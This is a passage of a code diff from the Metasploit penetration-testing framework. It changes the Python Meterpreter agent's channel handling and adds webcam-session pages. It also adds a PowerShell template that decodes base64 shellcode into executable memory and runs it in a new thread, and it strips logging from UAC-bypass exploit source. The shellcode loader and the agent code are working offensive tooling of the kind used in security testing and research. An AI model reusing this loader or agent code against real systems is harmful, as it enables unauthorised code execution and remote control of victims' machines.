d = channel.recv(1)
@@ -263,6 +317,21 @@ class PythonMeterpreter(object):
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if len(select.select([channel.fileno()], [], [], 0)[0]):
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
@@ -289,7 +358,9 @@ class PythonMeterpreter(object):
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys()
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
@@ -304,7 +375,7 @@ class PythonMeterpreter(object):
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_create_' + channel_type['value']
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return ERROR_FAILURE, response
handler = self.extension_functions[handler]
@@ -319,7 +390,7 @@ class PythonMeterpreter(object):
channel.close()
elif isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(s, socket._socketobject):
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
@@ -335,7 +406,7 @@ class PythonMeterpreter(object):
channel = self.channels[channel_id]
result = False
if isinstance(channel, file):
result = channel.tell() == os.fstat(channel.fileno()).st_size
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
@@ -368,7 +439,7 @@ class PythonMeterpreter(object):
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(s, socket._socketobject):
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
@@ -390,7 +461,7 @@ class PythonMeterpreter(object):
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.stdin.write(channel_data)
elif isinstance(s, socket._socketobject):
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
data/meterpreter/metsrv.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/metsrv.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/msflinker_linux_x86.bin
BIN
View File
Binary file not shown.
data/meterpreter/screenshot.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/screenshot.x86.dll
BIN
View File
Binary file not shown.
data/post/bypassuac-x64.dll
Executable
BIN
View File
Binary file not shown.
data/post/bypassuac-x64.exe
BIN
View File
Binary file not shown.
data/post/bypassuac-x86.dll
Executable
BIN
View File
Binary file not shown.
data/post/bypassuac-x86.exe
BIN
View File
Binary file not shown.
data/templates/scripts/to_mem_pshreflection.ps1.template
+27
View File
@@ -0,0 +1,27 @@
function %{func_get_proc_address} {
Param ($%{var_module}, $%{var_procedure})
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
}
function %{func_get_delegate_type} {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
)
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
return $%{var_type_builder}.CreateType()
}
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
data/templates/template_x64_windows.dll
BIN
View File
Binary file not shown.
data/templates/template_x86_windows.dll
BIN
View File
Binary file not shown.
data/webcam/answerer.html
+193
View File
@@ -0,0 +1,193 @@
<html>
<head>
<title>webcam_chat</title>
<style type="text/css">
div.container {
position: relative;
}
div.windowa {
height: 480px;
width: 640px;
border-radius: 15px;
-moz-border-raidus: 15px;
background-color: black;
position: absolute;
left: 50;
padding : 10px;
margin-left: auto;
margin-right: auto;
text-align: center;
vertical-align: middle;
color: white;
}
div.windowb {
height: 180px;
width: 200px;
border-radius: 15px;
-moz-border-raidus: 15px;
background-color: #9B9B9B;
position: absolute;
top: 480;
left: 470;
padding: 10px;
margin-left: auto;
margin-right: auto;
text-align: center;
vertical-align: middle;
}
div.windowc {
position: absolute;
top: 510;
left: 80;
height: 150px;
width: 380px;
color: red;
}
div.footer {
position: fixed;
bottom: 0;
width: 100%;
padding: 10px;
}
video.peer {
position: absolute;
top: 15;
left: 10;
}
video.self {
position: absolute;
top: 5;
left: 10;
}
</style>
<script src="=WEBRTCAPIJS="> </script>
<script>
window.onerror = function(e) {
document.getElementById("message").innerHTML = "Error: " + e.toString();
}
window.onload = function() {
document.getElementById("message").innerHTML = "Waiting for the session. When the session arrives, you must manually allow the webcam to run in order to join the session."
}
var channel = '=CHANNEL=';
var websocket = new WebSocket('ws://=SERVER=');
var inSession = false;
websocket.onopen = function() {
websocket.push(JSON.stringify({
open: true,
channel: channel
}));
};
websocket.push = websocket.send;
websocket.send = function(data) {
websocket.push(JSON.stringify({
data: data,
channel: channel
}));
};
var peer = new PeerConnection(websocket);
peer.onUserFound = function(userid) {
if (inSession) {
console.debug("Already in session, will not send another participation request");
return;
};
userid = "=OFFERERID=";
getUserMedia(function(stream) {
peer.addStream(stream);
peer.sendParticipationRequest(userid);
inSession = true;
document.getElementById("message").innerHTML = "Session is now active.";
});
};
peer.onStreamAdded = function(e) {
var video = e.mediaElement;
if (e.userid == 'self') {
video.controls = true;
video.setAttribute('width', 200);
video.setAttribute('height', 190);
video.setAttribute('controls', false);
video.setAttribute('class', 'self');
document.getElementById("windowb").appendChild(video);
}
else {
video.controls = true;
video.setAttribute('width', 640);
video.setAttribute('height', 460);
video.setAttribute('controls', false);
video.setAttribute('class', 'peer');
document.getElementById("windowa").appendChild(video);
}
video.muted = false;
video.volume = 0.5;
video.play();
};
peer.onStreamEnded = function(e) {
var video = e.mediaElement;
if (video) {
video.style.opacity = 0;
setTimeout(function() {
video.parentNode.removeChild(video);
}, 1000);
}
document.getElementById("message").innerHTML = "The video session has ended.";
};
function getUserMedia(callback) {
var hints = {audio:true,video:{
optional: [],
mandatory: {
minWidth: 1280,
minHeight: 720,
maxWidth: 1920,
maxHeight: 1080,
minAspectRatio: 1.77
}
}};
navigator.getUserMedia(hints,function(stream) {
var video = document.createElement('video');
video.src = URL.createObjectURL(stream);
peer.onStreamAdded({
mediaElement: video,
userid: 'self',
stream: stream
});
callback(stream);
});
}
</script>
</head>
<body>
<div class="container">
<div class="windowa" id="windowa">
</div>
<div class="windowb" id="windowb">
</div>
<div class="windowc">
<b>Session status (=RHOST=):</b><p></p>
<span id="message"></span>
</div>
</div>
<div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
</div>
</body>
</html>
data/webcam/api.js
+363
View File
@@ -0,0 +1,363 @@
// Muaz Khan - https://github.com/muaz-khan
// MIT License - https://www.webrtc-experiment.com/licence/
// Documentation - https://github.com/muaz-khan/WebRTC-Experiment/tree/master/websocket
(function () {
window.PeerConnection = function (socketURL, userid) {
this.userid = userid || getToken();
this.peers = {};
if (!socketURL) throw 'Socket-URL is mandatory.';
new Signaler(this, socketURL);
this.addStream = function(stream) {
this.MediaStream = stream;
};
};
function Signaler(root, socketURL) {
var self = this;
root.startBroadcasting = function () {
if(!root.MediaStream) throw 'Offerer must have media stream.';
(function transmit() {
socket.send({
userid: root.userid,
broadcasting: true
});
!self.participantFound &&
!self.stopBroadcasting &&
setTimeout(transmit, 3000);
})();
};
root.sendParticipationRequest = function (userid) {
socket.send({
participationRequest: true,
userid: root.userid,
to: userid
});
};
// if someone shared SDP
this.onsdp = function (message) {
var sdp = message.sdp;
if (sdp.type == 'offer') {
root.peers[message.userid] = Answer.createAnswer(merge(options, {
MediaStream: root.MediaStream,
sdp: sdp
}));
}
if (sdp.type == 'answer') {
root.peers[message.userid].setRemoteDescription(sdp);
}
};
root.acceptRequest = function (userid) {
root.peers[userid] = Offer.createOffer(merge(options, {
MediaStream: root.MediaStream
}));
};
var candidates = [];
// if someone shared ICE
this.onice = function (message) {
var peer = root.peers[message.userid];
if (peer) {
peer.addIceCandidate(message.candidate);
for (var i = 0; i < candidates.length; i++) {
peer.addIceCandidate(candidates[i]);
}
candidates = [];
} else candidates.push(candidates);
};
// it is passed over Offer/Answer objects for reusability
var options = {
onsdp: function (sdp) {
socket.send({
userid: root.userid,
sdp: sdp,
to: root.participant
});
},
onicecandidate: function (candidate) {
socket.send({
userid: root.userid,
candidate: candidate,
to: root.participant
});
},
onStreamAdded: function (stream) {
console.debug('onStreamAdded', '>>>>>>', stream);
stream.onended = function () {
if (root.onStreamEnded) root.onStreamEnded(streamObject);
};
var mediaElement = document.createElement('video');
mediaElement.id = root.participant;
mediaElement[isFirefox ? 'mozSrcObject' : 'src'] = isFirefox ? stream : window.webkitURL.createObjectURL(stream);
mediaElement.autoplay = true;
mediaElement.controls = true;
mediaElement.play();
var streamObject = {
mediaElement: mediaElement,
stream: stream,
userid: root.participant,
type: 'remote'
};
function afterRemoteStreamStartedFlowing() {
if (!root.onStreamAdded) return;
root.onStreamAdded(streamObject);
}
afterRemoteStreamStartedFlowing();
}
};
function closePeerConnections() {
self.stopBroadcasting = true;
if (root.MediaStream) root.MediaStream.stop();
for (var userid in root.peers) {
root.peers[userid].peer.close();
}
root.peers = {};
}
root.close = function () {
socket.send({
userLeft: true,
userid: root.userid,
to: root.participant
});
closePeerConnections();
};
window.onbeforeunload = function () {
root.close();
};
window.onkeyup = function (e) {
if (e.keyCode == 116)
root.close();
};
function onmessage(e) {
var message = JSON.parse(e.data);
if (message.userid == root.userid) return;
root.participant = message.userid;
// for pretty logging
console.debug(JSON.stringify(message, function (key, value) {
if (value && value.sdp) {
console.log(value.sdp.type, '---', value.sdp.sdp);
return '';
} else return value;
}, '---'));
// if someone shared SDP
if (message.sdp && message.to == root.userid) {
self.onsdp(message);
}
// if someone shared ICE
if (message.candidate && message.to == root.userid) {
self.onice(message);
}
// if someone sent participation request
if (message.participationRequest && message.to == root.userid) {
self.participantFound = true;
if (root.onParticipationRequest) {
root.onParticipationRequest(message.userid);
} else root.acceptRequest(message.userid);
}
// if someone is broadcasting himself!
if (message.broadcasting && root.onUserFound) {
root.onUserFound(message.userid);
}
if (message.userLeft && message.to == root.userid) {
closePeerConnections();
}
}
var socket = socketURL;
if(typeof socketURL == 'string') {
socket = new WebSocket(socketURL);
socket.push = socket.send;
socket.send = function (data) {
socket.push(JSON.stringify(data));
};
socket.onopen = function () {
console.log('websocket connection opened.');
};
}
socket.onmessage = onmessage;
}
var RTCPeerConnection = window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var RTCSessionDescription = window.mozRTCSessionDescription || window.RTCSessionDescription;
var RTCIceCandidate = window.mozRTCIceCandidate || window.RTCIceCandidate;
navigator.getUserMedia = navigator.mozGetUserMedia || navigator.webkitGetUserMedia;
window.URL = window.webkitURL || window.URL;
var isFirefox = !!navigator.mozGetUserMedia;
var isChrome = !!navigator.webkitGetUserMedia;
var STUN = {
url: isChrome ? 'stun:stun.l.google.com:19302' : 'stun:23.21.150.121'
};
var TURN = {
url: 'turn:homeo@turn.bistri.com:80',
credential: 'homeo'
};
var iceServers = {
iceServers: [STUN]
};
if (isChrome) {
if (parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2]) >= 28)
TURN = {
url: 'turn:turn.bistri.com:80',
credential: 'homeo',
username: 'homeo'
};
iceServers.iceServers = [STUN, TURN];
}
var optionalArgument = {
optional: [{
DtlsSrtpKeyAgreement: true
}]
};
var offerAnswerConstraints = {
optional: [],
mandatory: {
OfferToReceiveAudio: true,
OfferToReceiveVideo: true
}
};
function getToken() {
return Math.round(Math.random() * 9999999999) + 9999999999;
}
function onSdpError() {}
// var offer = Offer.createOffer(config);
// offer.setRemoteDescription(sdp);
// offer.addIceCandidate(candidate);
var Offer = {
createOffer: function (config) {
var peer = new RTCPeerConnection(iceServers, optionalArgument);
if (config.MediaStream) peer.addStream(config.MediaStream);
peer.onaddstream = function (event) {
config.onStreamAdded(event.stream);
};
peer.onicecandidate = function (event) {
if (event.candidate)
config.onicecandidate(event.candidate);
};
peer.createOffer(function (sdp) {
peer.setLocalDescription(sdp);
config.onsdp(sdp);
}, onSdpError, offerAnswerConstraints);
this.peer = peer;
return this;
},
setRemoteDescription: function (sdp) {
this.peer.setRemoteDescription(new RTCSessionDescription(sdp));
},
addIceCandidate: function (candidate) {
this.peer.addIceCandidate(new RTCIceCandidate({
sdpMLineIndex: candidate.sdpMLineIndex,
candidate: candidate.candidate
}));
}
};
// var answer = Answer.createAnswer(config);
// answer.setRemoteDescription(sdp);
// answer.addIceCandidate(candidate);
var Answer = {
createAnswer: function (config) {
var peer = new RTCPeerConnection(iceServers, optionalArgument);
if (config.MediaStream) peer.addStream(config.MediaStream);
peer.onaddstream = function (event) {
config.onStreamAdded(event.stream);
};
peer.onicecandidate = function (event) {
if (event.candidate)
config.onicecandidate(event.candidate);
};
peer.setRemoteDescription(new RTCSessionDescription(config.sdp));
peer.createAnswer(function (sdp) {
peer.setLocalDescription(sdp);
config.onsdp(sdp);
}, onSdpError, offerAnswerConstraints);
this.peer = peer;
return this;
},
addIceCandidate: function (candidate) {
this.peer.addIceCandidate(new RTCIceCandidate({
sdpMLineIndex: candidate.sdpMLineIndex,
candidate: candidate.candidate
}));
}
};
function merge(mergein, mergeto) {
for (var t in mergeto) {
mergein[t] = mergeto[t];
}
return mergein;
}
window.URL = window.webkitURL || window.URL;
navigator.getMedia = navigator.webkitGetUserMedia || navigator.mozGetUserMedia;
navigator.getUserMedia = function(hints, onsuccess, onfailure) {
if(!hints) hints = {audio:true,video:true};
if(!onsuccess) throw 'Second argument is mandatory. navigator.getUserMedia(hints,onsuccess,onfailure)';
navigator.getMedia(hints, _onsuccess, _onfailure);
function _onsuccess(stream) {
onsuccess(stream);
}
function _onfailure(e) {
if(onfailure) onfailure(e);
else throw Error('getUserMedia failed: ' + JSON.stringify(e, null, '\t'));
}
};
})();
data/webcam/offerer.html
+195
View File
@@ -0,0 +1,195 @@
<html>
<head>
<title>Video session</title>
<style type="text/css">
div.dot1 {
position: absolute;
width: 20px;
height: 20px;
margin: 30px auto 0;
border-radius: 50px;
background-color: red;
top: 150;
left: 470;
}
div.dot2 {
position: absolute;
width: 20px;
height: 20px;
margin: 30px auto 0;
border-radius: 50px;
background-color: red;
top: 150;
left: 505;
}
div.dot3 {
position: absolute;
width: 20px;
height: 20px;
margin: 30px auto 0;
border-radius: 50px;
background-color: red;
top: 150;
left: 540;
}
div.windowa {
height: 340px;
width: 420px;
border-radius: 15px;
-moz-border-raidus: 15px;
background-color: black;
position: absolute;
left: 20;
padding : 10px;
margin-left: auto;
margin-right: auto;
text-align: center;
vertical-align: middle;
color: white;
}
div.windowb {
height: 340px;
width: 420px;
border-radius: 15px;
-moz-border-raidus: 15px;
background-color: black;
position: absolute;
left: 570;
padding : 10px;
margin-left: auto;
margin-right: auto;
text-align: center;
vertical-align: middle;
color: white;
}
div.windowc {
position: absolute;
top: 400;
left: 60;
height: 50px;
width: 900px;
color: red;
}
div.footer {
position: fixed;
bottom: 0;
width: 100%;
padding: 10px;
}
</style>
<script src="api.js"> </script>
<script>
var channel = '=CHANNEL=';
var websocket = new WebSocket('ws://=SERVER=');
websocket.onopen = function() {
websocket.push(JSON.stringify({
open: true,
channel: channel
}));
};
websocket.push = websocket.send;
websocket.send = function(data) {
websocket.push(JSON.stringify({
data: data,
channel: channel
}));
};
var peer = new PeerConnection(websocket, '=OFFERERID=');
peer.onStreamAdded = function(e) {
var video = e.mediaElement;
video.setAttribute('width', 420);
video.setAttribute('height', 340);
video.setAttribute('controls', false);
video.volume = 0.5;
if (e.userid == 'self') {
document.getElementById("windowb").appendChild(video);
}
else {
document.getElementById("windowa").appendChild(video);
document.getElementById("message").innerHTML = "Session is now active.";
}
video.play();
};
peer.onStreamEnded = function(e) {
var video = e.mediaElement;
if (video) {
video.style.opacity = 0;
setTimeout(function() {
video.parentNode.removeChild(video);
}, 1000);
}
document.getElementById("message").innerHTML = "The video session has ended.";
};
window.onload = function() {
getUserMedia(function(stream) {
peer.addStream(stream);
peer.startBroadcasting();
});
};
function getUserMedia(callback) {
var hints = {audio:true,video:{
optional: [],
mandatory: {
minWidth: 1280,
minHeight: 720,
maxWidth: 1920,
maxHeight: 1080,
minAspectRatio: 1.77
}
}};
navigator.getUserMedia(hints,function(stream) {
var video = document.createElement('video');
video.src = URL.createObjectURL(stream);
peer.onStreamAdded({
mediaElement: video,
userid: 'self',
stream: stream
});
callback(stream);
});
}
</script>
</head>
<body>
<div class="windowa" id="windowa">
<b>You peer</b>
</div>
<div class="dot1"></div>
<div class="dot2"></div>
<div class="dot3"></div>
<div class="windowb" id="windowb">
<b>You</b>
</div>
<div class="windowc">
<b>Status:</b><p></p>
<span id="message">Waiting for your peer to join the video session...</span>
</div>
<div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
</div>
</body>
</html>
documentation/users_guide.tex
+2 -2
View File
@@ -878,7 +878,7 @@ The Metasploit Framework is distributed under the modified-BSD license defined b
{\footnotesize
\begin{verbatim}
Copyright (c) 2008, Rapid7 LLC
Copyright (c) 2008, Rapid7, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
@@ -891,7 +891,7 @@ are permitted provided that the following conditions are met:
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Rapid7 LLC nor the names of its contributors
* Neither the name of Rapid7, Inc. nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
external/ruby-kissfft/ext/kissfft/main.c
Vendored
+1 -1
View File
@@ -1,6 +1,6 @@
/*
ruby-kissfft: a simple ruby module embedding the Kiss FFT library
Copyright (C) 2009-2010 Rapid7 LLC - H D Moore <hdm[at]metasploit.com>
Copyright (C) 2009-2010 Rapid7, Inc - H D Moore <hdm[at]metasploit.com>
Derived from "psdpng.c" from the KissFFT tools directory
Copyright (C) 2003-2006 Mark Borgerding
external/ruby-lorcon/Lorcon.c
Vendored
+1 -1
View File
@@ -33,7 +33,7 @@
*/
/*
All ruby-lorcon/rubyisms are by Rapid7 LLC (C) 2006-2007
All ruby-lorcon/rubyisms are by Rapid7, Inc (C) 2006-2007
http://metasploit.com/ - msfdev[at]metasploit.com
*/
external/ruby-lorcon2/Lorcon2.c
Vendored
+1 -1
View File
@@ -37,7 +37,7 @@
*/
/*
All ruby-lorcon/rubyisms are by Metasploit LLC (C) 2006-2007
All ruby-lorcon/rubyisms are by Rapid7, Inc. (C) 2006-2007
http://metasploit.com/ - msfdev[at]metasploit.com
*/
external/source/DLLHijackAuditKit/analyze.js
Vendored
+1 -1
View File
@@ -1,4 +1,4 @@
/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
/* DLLHijackAuditKit (C) 2010 Rapid7, Inc */
var oFso = new ActiveXObject("Scripting.FileSystemObject");
var oShl = new ActiveXObject("WScript.Shell");
external/source/DLLHijackAuditKit/audit.js
Vendored
+1 -1
View File
@@ -1,4 +1,4 @@
/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
/* DLLHijackAuditKit (C) 2010 Rapid7, Inc */
function print_status(msg) {
try {
external/source/exploits/bypassuac/CMMN.cpp
Vendored Regular → Executable
-127
View File
@@ -8,46 +8,6 @@
#include <windows.h>
#include <WinIOCtl.h>
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
std::wstring CError::Format( DWORD ErrorCode )
{
return Format( ErrorCode, NULL, NULL );
}
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
{
LPVOID lpvMessageBuffer;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
NULL, ErrorCode,
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
(LPTSTR)&lpvMessageBuffer, 0, NULL);
std::wstring result;
std::wostringstream es(TEXT(""));
es << ErrorCode;
if ( Title )
{ result.append( Title ); result.append( TEXT("\n") ); }
else
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
if ( API )
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
if( lpvMessageBuffer )
{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
if ( lpvMessageBuffer )
{ LocalFree(lpvMessageBuffer); }
return result;
}
/*************************************************************************************************/
/*************************************************************************************************/
@@ -142,90 +102,3 @@ CInterprocessStorage::~CInterprocessStorage()
CloseHandle( _hMapping );
}
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
std::wstring CLogger::GetPath()
{
std::wstring path;
TCHAR buffer[MAX_PATH];
if ( GetTempPath( MAX_PATH, buffer ) )
{
path.assign( buffer );
path.append( TEXT("w7e.log") );
}
return path;
}
void CLogger::Reset()
{
DeleteFile( GetPath().c_str() );
}
void CLogger::LogLine( std::wstring& Text )
{
std::wstring tmp( Text.c_str() );
tmp.append( TEXT("\n") );
Log( tmp );
}
void CLogger::LogLine( )
{
Log( TEXT("\n") );
}
void CLogger::LogLine( const TCHAR *Text )
{
if ( Text )
LogLine( std::wstring( Text ) );
}
void CLogger::Log( const TCHAR Char )
{
std::wstring tmp;
tmp.append( &Char, 1 );
Log( tmp );
}
void CLogger::Log( const TCHAR *Text )
{
if ( Text )
Log( std::wstring( Text ) );
}
void CLogger::Log( std::wstring& Text )
{
TCHAR buffer[MAX_PATH];
//
// We have to check it every time to be reflective if user created this file
// while program was runnig.
//
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
{
std::wstring dbg( buffer );
dbg.append( TEXT(".debug") );
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if ( INVALID_HANDLE_VALUE == hdbg )
return;
CloseHandle( hdbg );
}
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
if( INVALID_HANDLE_VALUE != hFile )
{
SetFilePointer( hFile, 0, NULL, FILE_END );
DWORD written;
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
CloseHandle( hFile );
}
if ( mutex ) ReleaseMutex( mutex );
if ( mutex ) CloseHandle( mutex );
}
external/source/exploits/bypassuac/Redirector.cpp
Vendored Regular → Executable
+1 -20
View File
@@ -13,9 +13,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
assert( Parameter );
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
CLogger::Log( TEXT("Hello redirector thread: ") );
CLogger::LogLine( pair->Name );
CHAR read_buff[2];
DWORD nBytesRead,nBytesWrote;
@@ -25,11 +22,7 @@ DWORD WINAPI Redirector( LPVOID Parameter )
{
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("ReadFile") ) );
error = true && (!pair->KeepAlive);
break;
}
@@ -67,11 +60,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("WriteConsoleInput") ) );
error = true && (!pair->KeepAlive);
break;
}
@@ -80,11 +68,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
{
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("WriteFile") ) );
error = true && (!pair->KeepAlive);
break;
}
@@ -92,8 +75,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
}
}
CLogger::Log( TEXT("Bye redirector thread: ") );
CLogger::LogLine( pair->Name );
return EXIT_SUCCESS;
}
external/source/exploits/bypassuac/TIOR/TIOR.cpp
Vendored Regular → Executable
-13
View File
@@ -20,7 +20,6 @@
int _tmain(int argc, _TCHAR* argv[])
{
CLogger::LogLine(TEXT("TIOR: Hello"));
TRedirectorPair in = {0};
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
@@ -79,9 +78,6 @@ int _tmain(int argc, _TCHAR* argv[])
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
STARTUPINFO si = {0};si.cb = sizeof(si);
PROCESS_INFORMATION pi = {0};
@@ -100,11 +96,6 @@ int _tmain(int argc, _TCHAR* argv[])
if ( ! created )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
TEXT("TIOR: Unable to create child process"),
TEXT("CreateProcess")));
return EXIT_FAILURE;
}
@@ -113,14 +104,12 @@ int _tmain(int argc, _TCHAR* argv[])
CloseHandle( pi.hThread );
}
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
//
// Waiting for eny handle to be freed.
// Either some IO thread will die or process will be oevered.
//
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
//
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
@@ -132,11 +121,9 @@ int _tmain(int argc, _TCHAR* argv[])
// Dont forget to close child process. We need to be sure, if user terminated app which
// reads our redirected data, we terminate the target child app.
//
CLogger::LogLine(TEXT("TIOR: Killing child process"));
TerminateProcess( pi.hProcess, EXIT_FAILURE );
CloseHandle( pi.hProcess );
CLogger::LogLine(TEXT("TIOR: Exit"));
//
// I will not close any handles here - system will terminate and close all by it self.
external/source/exploits/bypassuac/TIOR/TIOR.vcxproj
